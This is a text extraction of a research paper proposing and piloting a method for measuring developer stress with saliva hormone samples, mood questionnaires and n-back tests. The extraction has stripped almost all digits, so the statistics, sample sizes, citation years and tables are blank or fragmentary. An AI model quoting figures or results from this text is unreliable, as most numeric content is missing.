other class, aiming at looking at stress coping strategies, uses questionnaires that ask general questions like “how do you handle stressful situations?” or “what kind of situations do stress you?”. this can also be done over a period of time, to gather a stress profile, by repeating these question over the day. stress also affects concentration and memory (weinert, ) because of the cognitive resources needed to cope with the increased stress. this use of cognitive resources is called cognitive load. cognitive load can be measured by testing concentration and memory of participants using tests like the n-back-test (gevins & cutillo, ). stress can also have a negative effect on a person’s mood, leading to frustration and anger at short-term and, at worst case, to a depression at long-term exposure, as mentioned in “effects of stress”. mood can be assessed by questionnaires like panas (positive and negative affect scale, watson, clark & tellegen ( )) or esr (emotional self rating scale, schneider et al. ( )). all these questionnaire based approaches can suffer from common issues and biases when working with humans participants (king & bruner, ; paulhus, ; schwarz, ): � honesty/image management: the problem how the participant wants to present him/herself and what he/she is willing to reveal about him/herself. � social desirability: the distortion of answers by the participants because they feel like some answers are more socially acceptable than others. � introspective ability: concerns to which degree the participant is able to understand him/herself. � understanding: as human language is not perfect and needs to be interpreted, formulations can be understood differently. � rating scales: the nuances of ratings can be interpreted differently. � response bias: the individual’s tendency to respond in a certain way, regardless of the actual evidence they are assessing. psychological tests have ways to balance such issues by providing control answers which show contradictions. despite that, it is always desirable to back up these results with biological factors which are much harder to be influenced by involuntary effects and biases. biological markers the biological factors available to us and mentioned in literature to measure stress are heart frequency, blood pressure, electrical conductivity of the skin, activity of muscles and hormone levels (birbaumer & schmidt, ). the assessment of these factors is not easy, as the difference between a normal phase of strain and abnormal stress needs to be considered and not every factor is applicable to each form of perceived stress (physiological, emotional, mental). ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ skin conductance the skin conductance is measured whenever the differential or changing impact of stress needs to be assessed (andreassi, ). electrodes have to be attached to the participants non-dominant hand. this approach has two main disadvantages: first, it might introduce additional stress as the electrodes are a constant reminder for the participant that they are being monitored and, in a typical case of software engineering research, it is not applicable to larger groups in parallel because of the need of multiple devices for measurement and medical trained personal for the correct application of the electrodes. sensors for measuring the sweating can be used if only a difference between calm and stressed states is of interest and no finer assessment is required. heart rate the measurement of heart rate and blood pressure can be a sensitive tool to measure mental stress (hjortskov et al., ) but it suffers from the same disadvantages as the measurement of skin conductance: the invasion of personal space and the in-feasibility to extend it to large groups, for the same reasons as mentioned for conductivity of skin. muscle activity we base our discussion of muscle activity on the works by boucsein ( , ). muscle activity can be measured, among other ways, via eye blink frequency, eye movement or mydriasis (size of the pupil) using an electromyogramm or observing muscle tremors. the difficulty to obtain the measurements and the expressiveness of these measures varies widely. while blinking frequency, eye movement and size of the pupil are relatively easy to measure for individuals, the results are heavily dependent on the task given and are only significant in combination with other measurements. tremors can be observed optically, but are mostly a sign of physical stress which is not a form of stress normally induced by computer work and so it is out of the scope of this work. the electromyogramm is a good method to measure muscle activity using electrodes similar to the one used to measure skin conductance. this again is more meaningful for the research on physical stress which the average software developer is not likely to experience in an extended amount in day to day work. besides the low relevance for software engineering, the methods to measure muscle activity suffer from the same disadvantages as mentioned for skin conductance. hormone level the usefulness of hormones for stress assessment has been shown by goldstein ( ) and noto et al. ( ). the hormone levels of cortisol and the protein alpha amylase (nater et al., ) which indicates the utilization of blood sugar are found in saliva samples (chiappelli, iribarren & prolo, ; kirschbaum & hellhammer, ; chatterton et al., ; reinhardt et al., ). saliva can be gathered and stored for a couple of days in plain plastic tubes, without any specialized equipment or sophisticated cooling mechanism. if the samples are to be stored for a longer time, they have to be frozen to avoid degradation. samples can be sent to a laboratory for analysis via postal service. the laboratory will use an analysis kit and return the analysis results. the results can be ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interpreted using basic statistical tests. support by medical trained scientists improves the quality of the conclusions drawn from the results as they might be able to explain possible outliers originating from health problems of the participants or medical drugs used by participants. hence, we opt for the latter biological family of stress assessment which we pair with validated psychological assessment. we propose a methodology in the following. proposed method for stress measurement the method we propose, inspired by kirschbaum & hellhammer ( ), van eck et al. ( ), and strahler et al. ( ), is applicable to controlled experiments in software engineering which aim to examine the effects of stress. it consists of measurements of psychological markers, measurements of biological markers, and a description of sequences and details of the measurements. the measurement tools for the psychological and biological markers have been selected in cooperation with psychologists, have been used in a massive amount of studies (e.g., hellhammer, wüst & kudielka ( ), khalfa et al. ( ), thompson et al. ( ) on hormone usage, e.g., pressman & cohen ( ), e.g., jennett et al. ( ) on panas and weiss, salloum & schneider ( ), schneider et al. ( ) on esr), and are commonly agreed to be reliable and valid. measurement tools we propose to assess stress, emotional state and cognitive load of participants, where the first factor is observed both from a psychological and a biological perspective. figure describes in greater detail the constructs under study and the related measurement instruments. we assessed stress using biological markers through saliva samples. in particular, we measured cortisol and alphaamylase, as the saliva samples are easy to gather and the hormone/enzyme levels in it are easy to measure by any laboratory specialized in hormone analyses. we propose panas (positive and negative affect scale, watson, clark & tellegen ( )) and esr (emotional self rating scale, schneider et al. ( )) for the psychological stress and emotional stress markers as self-ratings have a good time-to- information ratio. panas and esr are used to assess the participants emotional state and current mood, as increase in stress has a negative effect on mood (see “effects of stress”). we extended panas with questions asking about pre-existing stress levels and possible previous knowledge and skills related to the task to be done in the experiment, because previous knowledge can have an impact on coping strategies of the individual and have an impact on stress generation. with these extensions our panas scores for the positive factors ranges from to and the negative factors from to . cognitive load (see also “psychological measurements” on psychological measurements) is conveniently operationalized and measured by the n-back test as implemented by the computerized pebl psychological test battery (mueller & piper, ). pebl allows the data to be gathered automatically and exported as datasets. n-back challenges participants to memorize letters and their position in a sequence of letters which are shown one letter at a time. with a n-back test, participants have to press a key if a ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ letter has been repeated n steps back. for example, for the letter sequence {x, x, x, v, x, y, y} and a -back test, the key should be pressed at ( for key press, for no key press) { , , , , , , }. the correct key presses for a -back test would be { , , , , , , }. the hit/miss ratio and reaction time indicates how much cognitive capacity is left to work with. in order to reduce the learning effect when the test is used multiple times, there are variations of this test (e.g., not letters, but positions in a × square are to be correctly remembered). besides demographic data, a study should also collect control-variables that might influence the stress reaction, such as pre-existing mental conditions and medications (e.g., birth control pill). also, as this might have an increasing effect on personal stress, we asked how satisfied the participants were with their decision of life and work situation alongside the demographic questions. the data was gathered anonymously and linked together only through an anonymous identifier. figure our proposal for a robust and sound experimental design to assess causes and consequences of stress in software engineering. the grayed-out activities were omitted in the final design iteration. full-size doi: . /peerj-cs. /fig- ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ measurement sequence the first step in implementing our proposed method is to decide on the frequency and placement of the cortisol and alphaamylase measurements. the decision should take into consideration that, while more measurement points in a shorter period of time will provide a more detailed picture of the stress reaction to the topic under observation, it also will affect the stress generation itself. the shortest cycle is also limited by a few parameters. participants only have a limited ability to generate enough saliva. too frequent disruptions might be perceived as a nuisance, increase the generated stress, and might have an additional negative effect on the topic under research or even cover the stress reaction under observation. also, the hormone system reacts in the range of minutes to hours whereas the nervous transmission reacts in milliseconds (cortisol peeks around – min after stress onset (kirschbaum & hellhammer, )). if the stress-inducing task is too short (less than min) a second sample should be gathered to increase the chance to include the peak or other measurements (e.g., heart rate or skin conductivity) can be used, but with the impediments stated above. as cortisol has a daily cycle, the gathering of the saliva samples also needs to be planned in a way that all participants are assessed at the same time to generate comparable results. in order to add noise to the cortisol and alphaamylase measurements, it is important to instruct the participants to not consume beverages containing sugar and not to eat or smoke one hour before the saliva samples are gathered. the times when the personal stress and emotional state are assessed have to be adjusted as well. as it takes a non-trivial amount of time to fill in the questionnaires, the personal and emotional assessment should happen at the beginning of the study to determine a measurement baseline, then at appropriate times in the course of the study and at the end of it. in the case of short periods of saliva sample measurements it is sufficient to have the personal stress levels and emotional state measured at the start and end of a task. if the topic under research contains longer breaks we advise to use the questionnaire measurement at the start and end of the breaks. for long term studies, we advise to use the self-assessment via questionnaires at least twice a day, possibly at the beginning and end of the work day. by doing so, the influence of stress generated outside the object under research can be identified and taken into account when looking at the stress reaction. in our case, the measurement of the cognitive load happens after a substantial part of the task under research and before the questionnaires assessing the personal stress level and mood, so the cognitive load is only influenced by the task. as with the questionnaires, for long-term studies, the n-back should be used at the start and end of the working period. we illustrate the entire design process in fig. . it represents the process as it was derived from our literature review and consultations with colleagues from the psychological and medical fields. participants face a short cool-down period (approx. min) of no activities, for controlling purposes, during which most of their markers stabilize. we then instruct participants about the experiments goals. after that, the participants sign a consent form (not present in fig. ). we collect a first sample of ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ saliva, which sets the baseline stress value of participants. after the baseline stress measurement, participants fill in demographic questionnaires. following the demographic questionnaires, we start assessing the baseline mood and perceived stress with esr and panas. participants then face the first computerized task, that is the n-back test, for assessing the baseline cognitive load. as the n-back test might be stressful to participants, we take a second saliva sample to be able to monitor the stress build-up for the task under observation later. the “stress” task for the experimental and control groups can then begin. the length and amount of the experimental task parts (fig. shows two parts) should be dictated by the decision on the saliva sample interval. in our case, we take a third saliva sample at around half of the time planned for task solving. the stress markers cortisol and alphaamylase should be peaking here as the endocrine system has had enough time to respond to the initial stress trigger of the task (cortisol peeks around – min after stress onset (kirschbaum & hellhammer, )). we take a fourth and final saliva sample at the end of the experimental task. finally, participants do the computerized cognitive load test once more, to measure the available cognitive resources left after the experimental task. a final set of ratings of mood and perceived stress follows. the last two activities are inverted compared to those before the task, as the cognitive load score should not be influenced by the questions for rating mood and self-assessment. longer studies performed over several days have a similar design to fig. , varying only in the intervals of measurements as mentioned above. if the assessment of the recovery from the stressor is of interest, a measurement of all relevant indicators (cognitive load, mood, perceived stress, hormone/enzyme levels,…) should be done – min after the stressor onset. in the remainder of this paper, we report on two studies that allowed us to implement and refine the overall research design. two studies implementing the proposed method in the following, we present two studies, the first being a pilot, implementing our proposed method for stress assessment. the lessons learned from the application of this method helped us with its refinement. the purpose of our studies was to analyze stress reduction effects, cognitive load reduction, mood improvement, and software quality enhancement of visual and user experience changes to the static analysis tool findbugs. the control group used the latest version of findbugs. the experiment group used a version of findbugs which was modified following the salutogenesis principles. salutogenesis is a well-being theory, based on comprehensibility, meaningfulness and manageability to explain perceived stress or to help cope with it by changing these variables. we have previously proposed this for enhancing the interaction of software developers with their tooling (see ostberg & wagner ( ) and ostberg et al. ( ) for details on salutogenesis). by design, all tasks required a considerable effort and it was not possible to finish them in the time given. the varying difficulty of the subtasks does not require the participants to meet a certain ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ level of skill, but some basic understanding of programming, yet still provides enough of a challenge for the advanced participant. pilot study the pilot study implemented the method of fig. in its entirety. we only added a set of questions aiming at self-efficacy (bandura, ; jerusalem & schwarzer, ; kogler et al., ) to the psychological test phases, which allowed us to assess the individual stress resilience of the participants. for the pilot we recruited volunteers from the msc course “software quality assurance and maintenance” at the university of stuttgart. students were in their nd or rd semester of studies. none of them reported any medical conditions interfering with the stress measurement. we were aiming for a high number of participants even in the pilot as we wanted to evaluate how easily large groups can be assessed with our chosen methods. to induce stress, the participants were told that a list with the results of their work on the code (number of correct fixes) would be made public, so every participant could see how well he or she did, compared to the other participants. we never delivered on our threat, for obvious ethical reasons, but the stress was induced by our statements. we split the work phase into two parts of min and min, the first part was a bit longer in order to compensate for the time needed to get into the task. to avoid learning effects, the second n-back test used positions in squares rather than letters. results unfortunately, we faced some data loss due to failing hard drives. boxplots in figs. – shows the data we were able to retain. figure shows the distribution of the panas values. from bottom to top we have the sum of the positive factors before the task, the positive factors after the task, the negative factors before the task and the negative factors after the task. the top four plots show the difference between pre and post panas scores. this shows the progression of the emotional state of the participants. figure shows the number of correct responses to the n-back stimulus in percent and fig. shows the reaction time in milliseconds to the n-back stimulus, both pre and post the task. the values for correctness and reaction time are connected, so the participants for both values are the same. of the panas and esr questionnaires, out of from the experiment group and out of from the control group were usable. the emotional state based on the panas values is calculated by summing up the positive effects and subtracting the sum of the negative effects. to see the emotional change, we calculated these values pre and post-work phase. the difference of these values indicates the emotional change. performing a repeated measures (rm) anova with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant effect of time (f( , ) = . , p = . ), a significant valence effect (f( , ) = . , p = . , part-eta-sq. = . ) with higher values in the positive valence than negative valence, ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure panas pos(itive) and neg(ative) mood indicators exp(erimental) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- figure n-back correctness for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and no significant group effect (f( , ) = . , p = . ). moreover, no interaction reached significance (all p > . ). the data of the esr (see also tables and ) does also not show statistically significant group differences for the emotion (all p > . ) and stress (p = . ) ratings. table reports all values we gathered for cortisol and alphaamylase. see fig. for the location of the various measurements in the study progress. the sample size refers to the actual sample size used for calculations at this step, as the lab analysis reported invalid values for some steps/participants, probably due to not enough saliva samples left as they had to rerun some of the analysis. from the numbers we can see a build up of a figure n-back reaction time for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- table pre and post-experiment task values for esr factors, experiment group, pilot, sample size = . anger disgust happiness sadness surprise fear stress esr pre experiment group mean . . . . . . . standard deviation . . . . . . . median . . . . . . . esr post experiment group mean . . . . . . . standard deviation . . . . . . . median . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hormone stress response with a slightly later peak in alpahamylase for the experiment group. the statistical tests (willcoxon u for α = . for cortisol (c = . , c = . , c = . , c = . ), cliff’s delta for cortisol (c = − . , c = − . , c = − . , c = − . ), t-test for α = . for alphaamylase (a = . , a = . , a = . , a = . ) cliff’s delta for alpha amylase (a = − . , a = − . , a = − . , a = − . )), reveal no significant differences between experiment and control-group. a rmanova table pre and post-experiment task values for esr factors, control group, pilot, sample size = . anger disgust happiness sadness surprise fear stress esr pre control group mean . . . . . . standard deviation . . . . . . median esr post control group mean . . . . . standard deviation . . . . . . median table cortisol and alpha-amylase scores, pilot. experiment control experiment control baseline cortisol (pg/ml) offset cortisol (pg/ml) mean . . . . deviation . . . . median . . . . sample size peak cortisol (pg/ml) final cortisol (pg/ml) mean . . . . deviation . . . . median . . . . sample size baseline alphaamylase offset alphaamylase (u/l) mean . . . . deviation . . . . median . . . . sample size peak alphaamylase (u/l) final alphaamylase (u/l) mean . . . . deviation . . . . median . . . sample size ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ revealed no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ) and no significant group*time interaction (f( , ) = . , p = . ). similar to the results on cortisol, rmanova with alphaamylase levels indicated no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ) and no significant time*group interaction (f( , ) = . , p = . ). the raw data of the hormone levels can be found in the appendix in tables a and a . the increasing effect size might imply that the differences between the control and experiment groups would grow more visible if the experiment would progress longer and if we had had more usable data points. it is also possible that a greater stress induction will lead to a more visible effect. due to various problems at the time of the experiment’s execution, we were only able to gather usable data sets (correctness/reaction time for pre and post task) for the control group and data sets for the experiment group for the n-back test. for these data sets, the other data (panas, esr and hormone/protein levels) is also available. in the pilot we see an improvement of correctness and reaction time for the experiment group (see median in boxplot figs. and ), while the correctness for the control group decreases. still, analyzing the effect of intervention on cognitive performance, the rmanova with the within-subject factor time (pre, post) and between-subjects factor group revealed no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ), and no significant time*group interaction (f( , ) = . , p = . ) emerged. conclusion despite the data being inconclusive, the pilot experiment showed the feasibility of the design. the saliva samples were easy to collect for both, the participants as well as for the researchers, and indications given by the physical measurements match the indications of the psychological measurements. we used the lessons learned to make some changes to the study design which we will discuss next. study in the design of the second study the grayed-out parts of fig. are removed. this represents our changes based on the lessons learned of the pilot. we removed the initial cool-down factor and the first saliva sample. for the sake of consistency with the figure, we still call our new first saliva sample the offset stress, but we consider that measurement step our new baseline stress. the pilot test did not suggest potential differences in the measured levels within baseline stress and between baseline and offset stress, so we assume that the psychological test and n-back session do not induce any significant stress to software developers. as a positive side effect, this elimination of one of the saliva samples reduces the time and money needed for the laboratory analysis. we also reduced the amount of questionnaires in the psychological test phases by removing the resilience questions. the value of these question items did not help in ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ explaining any of the effects analyzed. during our observation and in post-experiment statements, participants seemed to be most irritated by the resilience questions. we also changed the way we induce stress to the participants in the hope that the changed procedure would show an increased reaction. first we stimulated the participants with a hardly reachable goal for the work on the software. we told them that previous participants had done a minimum of fixes for problems highlighted by findbugs in different categories and that these were the low achievers. second, as the groups were much smaller ( – participants per session) we could recreate an effect similar to the tsst (kirschbaum, ) effect, by simply having evaluators in the room monitoring the work of the participants and pretending to write down remarks on their notepad from time to time with muttering disapproval. for this experiment we were able to recruit participants from the bachelor study course “introduction to software engineering”. the participants were randomly distributed over dates, for the control group and for the experiment group, resulting in participants in the experiment group and participants in the control group. again, as in the pilot, the experiment group used our enhanced tool, while the control group used the original tool. none of the participants reported any medical conditions interfering with the stress measurement. results the results of the panas questions (see boxplot in fig. , missing samples either did not finish or did not fill in questionnaires fully, see “pilot study ” for description of layout) show that both groups experienced a decrease in mood, but the decrease was steeper for the control group (median for positive factors declines by , median for negative factors increases by ) than for the experiment group (median for positive factors declines by , median for negative factors increases by ). still, the range of mood change for both groups is spread over a wide spectrum, so the results are not statistically significant (wilcox p = . for α = . ) and the effect size (cliff’s delta: − . ) is low. performing a repeated measures (rm) anova with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant time effect (f( , ) = . , p = . ) but a significant valence effect (f( , ) = . , p < . ) as well as a significant time*valence interaction (f( , ) = . , p = . ). however, no significant group effect (f( , ) = . , p = . ) as well as no significant interactions with the factor group emerged (p > . in all cases). applying post-hoc analyses on the significant interaction demonstrated a significant increase in negative mood (post > pre, p = . ) and a significant decrease in positive mood (pre > post, p = . ). in general, positive ratings were significantly higher than negative ratings (pre: p < . ; post: p = . ). from the results of the esr questions (tables and ), we learned that the control group experienced an increase in disgust and surprise compared to the experiment group. also, both groups show an increase in self-reported stress but the standard deviation for the experiment group also increased which implicates that at least some participants experienced less stress. the repeated measures (rm) anova shows a significant condition ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effect (f( , ) = . , p < . ), a trend for a time effect (f( , ) = . , p = . ), with higher values post than pre, and no significant group effect (f( , ) = . , p = . ) emerged. moreover, a significant interaction of condition*time (f( , ) = . , p = . ) occurred, while no other interaction reached significant (p > . in all cases). post-hoc tests disentangling the significant interaction revealed a significant increase in anger ratings (post > pre, p = . ) and a significant decrease in happiness ratings (pre > post, p = . ). all other comparisons remained non significant (p > . ). the cognitive load (see figs. and , missing samples did not finish both n-backs, see “pilot study ” for description of layout) again shows the same effect as seen in the pilot figure panas pos(itive) and neg(ative) mood indicators exp(erimental) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- table pre and post-experiment task values for esr factors, experiment group, study , sample size = . anger disgust happiness sadness surprise fear stress esr pre experiment group mean . . . . . . . standard deviation . . . . . . . median . . . . . . . esr post experiment group mean . . . . . . . standard deviation . . . . . . . median ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (correctness (mean increased by . % points) and response time improvement (median decreased by about ms) for experiment group vs. correctness decrease (mean by % point) for control group) but still is not statistically significant.the wilcox test does not reveal a statistical relevance (p = . , α = . ). the slight reduction in response time and increase in correctness for both groups originates most likely from a learning effect. performing the rmanova with time as within-subject factor and group as between- subjects factor showed a significant time effect (f( , ) = . , p = . ), no group effect (f( , ) = . , p = . ) but a significant time*group interaction (f( , ) = . , p = . ). disentangling the significant time*group interaction revealed a significant table pre and post-experiment task values for esr factors, control group, study , sample size = . anger disgust happiness sadness surprise fear stress esr pre control group mean . . . . . . . standard deviation . . . . . . . median esr post control group mean . . . . . . . standard deviation . . . . . . . median figure n-back correctness for the exp(eriment) group (sample size= ) and con(trol) group (sample size= ). full-size doi: . /peerj-cs. /fig- ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ group difference before the intervention (pre: p = . ), with better performance in the control group. after the intervention (post), no significant group difference emerged (p = . ). while the experimental group did not show a change in performance (pre vs. post, p = . ), the control group showed a significant decrease (pre vs. post, p = . ). the median of the cortisol measurements (see table ) for the control group are slightly higher but the alphaamylase values are lower. however, this test shows no statistical significance (willcoxon u for α = . for cortisol (c p = . , c p = . , c p = . ), cliff’s delta for cortisol (c : . , c : . , c : . ), t-test for α = . for alpha amylase figure n-back reaction time for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- table cortisol and alpha-amylase scores, study . experimental control experimental control experimental control offset cortisol (pg/ml) peak cortisol (pg/ml) final cortisol (pg/ml) mean . . . deviation . . . . . . median . . . . . . sample size offset alphaamylase (u/l) peak alphaamylase (u/l) final alphaamylase (u/l) mean . . . deviation . . . . . . median . . . . . sample size ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (a p = . , a p = . , a p = . ), cliff’s delta for alpha amylase (a :− . , a :− . , a :− . )). the raw data of the hormone levels can be found in the appendix in tables a and a . the rmanova with time and group revealed a significant time effect (f( , ) = . , p < . ), indicating a significant decrease from t to t (t vs. t : p < . ; t vs. t : p = . ; t vs. t : p < . ), but no group effect (f( , ) = . , p = . ) nor group*time interaction (f( , ) = . , p = . ). similar to the cortisol analysis, the rmanova for the alphaamylase indicated a significant time effect (f( , ) = . , p < . ), demonstrating a significant increase from t to t (t vs. t : p < . , t vs. t : p = . ; t vs. t : p < . ), but no significant group effect (f( , ) = . , p = . ) nor a significant group*time interaction (f( , ) = . , p = . ). this means that the experiment group had a lower chemical stress reaction but a higher need for chemical energy. this might be an indicator that the experiment group reached an energy consuming coping strategy for the given problem sooner. the statistical power increases which indicates, that a larger group or a greater stress induction could show a more prominent effect. still, the overall design proved to be feasible and changes made compared to the pilot have shortened the time needed to analyze the generated data. limitations based on lessons learned (and the useful suggestions of two anonymous reviewers), we summarize potential limitations that threat the validity of results, should our design be adopted. unreported medical conditions participants might refrain to reveal severe medical conditions, like addison’s disease or cushing’s syndrome, which influence the levels of hormones that are measured in our design, but we also believe that such issues have negligible impact on the results of studies from our design. first of all, conditions with severe impact on the measurements are rare, as, for example, addison affects about . to . per , people in the developed world (neto & de carvalho, ) and cushing’s syndrome is even rarer (lindholm et al., ). also, values arising from pathologically changed hormone values should be visible as outlier in the data. stress induction the stress induced to participants has to be large enough to be significant and distinguishable from the (quite low) stress induced by the measurement instruments (n-back, saliva samples and questionnaires). we have tried to balance stress induction vs. quality of measurement with our selected tools. our collected data has shown that our stress induction effect has been too low. to plan the stress induction accordingly, we advise to take a closer look at the different way stress can be induced in psychological research (e.g., kirschbaum ( ) as an example of socially induced stress or kang & fox ( ) as an example of cognitive stress induction). ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning effects of participants some stress measurement tools (e.g., the n-back test) base their results on memory and reaction time of the participants. to keep the effect of learning at a minimum the tests should be randomized to the best possible extent. in our case we used two different versions on the n-back (see “measurement tools”). reuse of the stress task under research if a task is being reused, participants might give away information about the task to other future participants. the information flow should be restricted if possible, as uncertainty is part of the stress generation (see “definition of stress”). while in our case the task was reused, our task consisted of several many subtasks with no clear correct answer: communication would not have done harm. it was also our design to keep participants uncertain about their performance on the task, as well as the task itself. lessons learned in the following, we report on our experience and the lessons learned in more detail which we believe are valuable for future research attempts building upon our method. on effort and monetary costs the cost per combined measurement (cortisol and alphaamylase) and basic statistical analysis for one saliva sample was about euros (swiss health care, , http://swisshealthcare.de). this amounts to about euros per participant for the pilot and about euros per participant for the second study. probably this cost can be reduced by arranging a high-volume contract with a laboratory or finding a cheaper provider of this service. also, analysis of only cortisol reduces the cost per measurement by up to more than %. sometimes, as in our case, university departments (e.g., medicine, biology, chemistry) already have a contract with a laboratory or might even be able to provide the analysis themselves. compared to other equipment for stress measurement, our method lies in the mid section of overall costs. there are cheap heart rate monitors and skin conductance measurement tools but it depends again on the study and the aspects to be tested if they can be used effectively. higher priced tools, like eeg (electroencephalography), can deliver other, maybe more precise results but the process is not easily applicable to large groups. also, those tools need consumables, like electrodes, driving up the costs. additionally, we need to keep in mind that with the cost for the hormone analysis equipment we are also covering a small part of the analysis of the results as well, as most labs deliver basic statistical calculations (mean, median, standard deviation,….) with the raw measurement data. the analysis of the results of other tools mentioned will require the help of medical trained personnel; for detailed results rather than just coarse indications, while with the data provided by the lab we can analyze effects with basic statistics. no process is worth the effort if it does not deliver results. our case is somewhat inconclusive. we can identify times with higher and lower stress from our results of the ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://swisshealthcare.de http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hormone levels. the additional information gathered (e.g., the n-back results) backs up these results. however, we were not able to find a significant difference between the groups in our studies but we strongly suppose that this is due to other problems within these experiments (e.g., too small sample size due to data loss) or that the effect we were trying to observe was too small to be observed with this kind of design. in conclusion we believe that our proposed measurement process can enable non medical or psychological researchers to examine the influence of stress in processes. our proposed measurements allow for a more detailed analysis, quick and easy applicable even in larger groups. however, our method can only deliver a first glance at stress-related problems. for an in-depth research on stress effects we strongly recommend to seek cooperation with medical or psychological stress scientists. data protection we tried to gather as few personal data as possible but our proposed method will collect sensitive data beyond the usual demographic data of software engineering studies, that is, medical data. besides adhering to the local laws on data protection, we believe that extra care should be taken when gathering, storing, and processing these data. before the pilot, we had an extensive discussion with the data protection agency, a german federal agency in charge of enforcing and consulting on data protection laws. we decided to remove the personalization of the data points (pseudo-anonymised data). we talk about pseudo-anonymised data as the recent european data protection law especially has this term within its text in contrast to the old law which defined a term of “anonymised data”. pseudo-anonymisation is reached when no relation can be easily established to the personal data (e.g., names, gender…) in contrast to full anonymisation, where the relation to personal data can be reestablished under no circumstance. in our case, we would only reestablish the connection to personal data if we were able to access to the data of all university students and, even then, only with a tiny probability. in other words, we cannot reestablish the connection. it is even more important to supply a written statement that explains what data will be gathered, for what purpose and the right to revoke the agreement and, also, the permission to use the gathered data at any time. with his or her signature, each participant should agree to these terms beforehand. this also shows the participants that their personal data will be handled securely and fairly. effectiveness and ethics of stress induction techniques the issue of putting human participants under stress despite the potential health risks has to be addressed. we believe that the risk of permanent problems as a result of an experiment as described here is highly unlikely. the stress created is only temporary and is not more severe than day-to-day stress peaks. still, it might be desirable to screen potential participants for preexisting issues which can amplify the negative effects of stress (e.g., a mental disorder). it is also necessary to fully inform the participants about the stress parts of the experiment beforehand if possible. additionally, we advise to contact an ethics committee, if available, especially if drastic changes to the stress induction are made. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ still, to our experience a formal investigation by an ethics committee is not necessary for this kind of study. additionally, we believe that there is a similarity with the issues in controlled experiments observing affect (moods, emotions). as summarized by graziotin ( ), several studies have doubted the effectiveness of short mood-induction techniques for psychological experiments, where participants’ affect is manipulated through several techniques, for example, watching a sad movie, and effective long-term induction techniques might raise several ethical concerns, for example, as with the facebook emotion contagion experiment (shaw, ). seeing how difficult it has been for us to manipulate stress when employing a robust methodology, we wonder whether the same mechanisms occur for stress induction technique, and if we should rather perform in situ studies. however, this reasoning is speculation at this point. future studies should address the question of whether stress induction techniques are ineffective for controlled experiments. conclusion in this work, we provided a brief introduction to stress theories and the effects of short-term and long-term exposure on mind and body. we explained how the world of software development is also saturated by stress-inducing events. we discussed how stress can be measured and proposed an efficient way to enable software engineering research to investigate the effects of stress on different processes including software engineering applications. we used our proposed measurement technique in two experiments rendering the approach as feasible and applicable to research on larger groups in software engineering. with this, we hope to enable and make the transfer of medical and psychological methods and knowledge to software engineering easier. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ appendix appendix of raw data raw data of cortisol and alpha-amylase scores table a results of the measurement of cortisol (picogramm per milliliter) in the gathered saliva samples of the first experiment. c(s ) (pg/ml) c(s ) (pg/ml) c(s ) (pg/ml) c(s ) (pg/ml) cont. exp. cont. exp. cont. exp. cont. exp. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . – . . . . . . . – . . . . . . . – . . . . . . . – . . . . . – – – . . . . . – – – . – . – . – – – . – . – . – – – . – . – – – – – . – . – – – – – . – . – – – – – median: . . . . . . . . 